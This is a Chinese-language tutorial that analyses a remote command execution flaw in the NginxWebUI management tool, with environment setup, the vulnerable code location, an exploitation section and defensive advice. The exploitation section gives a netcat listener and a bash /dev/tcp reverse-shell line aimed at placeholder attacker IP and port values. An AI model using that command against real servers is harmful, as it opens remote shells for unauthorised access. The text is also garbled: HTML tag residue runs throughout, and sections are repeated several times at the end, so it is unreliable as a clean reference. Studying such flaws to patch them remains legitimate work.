NginxWebUI RCE漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2>
NginxWebUI是一个基于Java开发的Nginx图形化管理工具，存在远程命令执行(RCE)漏洞。该漏洞位于`com.cym.controller.adminPage.ConfController#check<\/code>方法中，由于对用户输入参数处理不当，导致攻击者可以构造恶意请求执行任意系统命令。<\/p>`

2. 环境搭建<\/h2>
2.1 项目获取<\/h3>
git clone https:\/\/github.com\/cym1102\/nginxWebUI
<\/span><\/span><\/code><\/pre>2.2 Docker环境准备<\/h3>
使用以下Dockerfile构建环境：<\/p>
FROM<\/span> ubuntu<\/span>
<\/span><\/span><\/span><\/span>RUN<\/span> sed -i 's\/archive.ubuntu.com\/mirrors.ustc.edu.cn\/g'<\/span> \/etc\/apt\/sources.list \
<\/span><\/span><\/span><\/span>    &&<\/span> apt update \
<\/span><\/span><\/span><\/span>    &&<\/span> apt -y install openjdk-11-jdk \
<\/span><\/span><\/span><\/span>    &&<\/span> apt -y install nginx \
<\/span><\/span><\/span><\/span>    &&<\/span> apt -y install wget \
<\/span><\/span><\/span><\/span>    &&<\/span> apt -y install git \
<\/span><\/span><\/span><\/span>    &&<\/span> apt -y install maven \
<\/span><\/span><\/span><\/span>    &&<\/span> apt -y install vim
<\/span><\/span><\/span><\/code><\/pre>2.3 启动方式<\/h3>
java -jar xxx.jar
<\/span><\/span><\/code><\/pre>3. 漏洞分析<\/h2>
3.1 漏洞位置<\/h3>
漏洞位于com.cym.controller.adminPage.ConfController<\/code>类的check<\/code>方法中。<\/p>
3.2 关键代码分析<\/h3>
\/\/ 存在命令执行的代码点
<\/span><\/span><\/span><\/span>RuntimeUtil.<\/span>execForStr<\/span>(...)<\/span> \/\/ 来自hutool组件的方法
<\/span><\/span><\/span>\/\/ 最终调用ProcessBuilder#start方法进行命令执行
<\/span><\/span><\/span><\/code><\/pre>3.3 参数传递<\/h3>
传入的参数cmd<\/code>由以下三部分组成：<\/p>

nginxExe<\/code><\/li>
fileTemp<\/code><\/li>
nginxDir<\/code><\/li>
<\/ol>
当未传入参数时，nginxExe<\/code>和nginxDir<\/code>会从settingService<\/code>获取，这两个参数可控。<\/p>
4. 漏洞利用<\/h2>
4.1 反弹Shell利用<\/h3>

首先在攻击机上监听端口：<\/li>
<\/ol>
nc -lvnp [<\/span>监听端口]<\/span>
<\/span><\/span><\/code><\/pre>
构造恶意请求访问check接口，注入反弹Shell命令：<\/li>
<\/ol>
bash -i >& \/dev\/tcp\/[<\/span>攻击机IP]<\/span>\/[<\/span>监听端口]<\/span> 0>&1<\/span>
<\/span><\/span><\/code><\/pre>4.2 直接命令执行<\/h3>
通过控制nginxExe<\/code>或nginxDir<\/code>参数，注入任意系统命令。<\/p>
5. 防御建议<\/h2>

对用户输入进行严格的过滤和验证<\/li>
使用白名单机制限制可执行的命令<\/li>
避免直接拼接用户输入到系统命令中<\/li>
使用安全的API替代Runtime.exec()等危险方法<\/li>
及时更新到修复漏洞的版本<\/li>
<\/ol>
6. 相关技术<\/h2>

Java安全编程<\/li>
命令注入防御<\/li>
Hutool组件安全使用<\/li>
ProcessBuilder安全实践<\/li>
<\/ul>
7. 参考链接<\/h2>

原始漏洞报告: [FreeBuf文章链接]<\/li>
项目地址: https:\/\/github.com\/cym1102\/nginxWebUI<\/li>
Hutool文档: https:\/\/hutool.cn\/docs\/<\/li>
<\/ul>

NginxWebUI RCE漏洞分析与利用教学文档<\/h1>

3. 漏洞分析<\/h2>

3.1 漏洞位置<\/h3>
漏洞位于`com.cym.controller.adminPage.ConfController<\/code>类的check<\/code>方法中。<\/p>`

4.2 直接命令执行<\/h3>
通过控制`nginxExe<\/code>或nginxDir<\/code>参数，注入任意系统命令。<\/p>`

7. 参考链接<\/h2>

原始漏洞报告: [FreeBuf文章链接]<\/li>
项目地址: https:\/\/github.com\/cym1102\/nginxWebUI<\/li>
Hutool文档: https:\/\/hutool.cn\/docs\/<\/li> <\/ul>

NginxWebUI RCE漏洞分析与利用教学文档<\/h1>

3. 漏洞分析<\/h2>

3.1 漏洞位置<\/h3> 漏洞位于com.cym.controller.adminPage.ConfController<\/code>类的check<\/code>方法中。<\/p>

4.2 直接命令执行<\/h3> 通过控制nginxExe<\/code>或nginxDir<\/code>参数，注入任意系统命令。<\/p>

7. 参考链接<\/h2> 原始漏洞报告: [FreeBuf文章链接]<\/li> 项目地址: https:\/\/github.com\/cym1102\/nginxWebUI<\/li> Hutool文档: https:\/\/hutool.cn\/docs\/<\/li> <\/ul>

3.1 漏洞位置<\/h3>
漏洞位于`com.cym.controller.adminPage.ConfController<\/code>类的check<\/code>方法中。<\/p>`

4.2 直接命令执行<\/h3>
通过控制`nginxExe<\/code>或nginxDir<\/code>参数，注入任意系统命令。<\/p>`

7. 参考链接<\/h2>

原始漏洞报告: [FreeBuf文章链接]<\/li>
项目地址: https:\/\/github.com\/cym1102\/nginxWebUI<\/li>
Hutool文档: https:\/\/hutool.cn\/docs\/<\/li> <\/ul>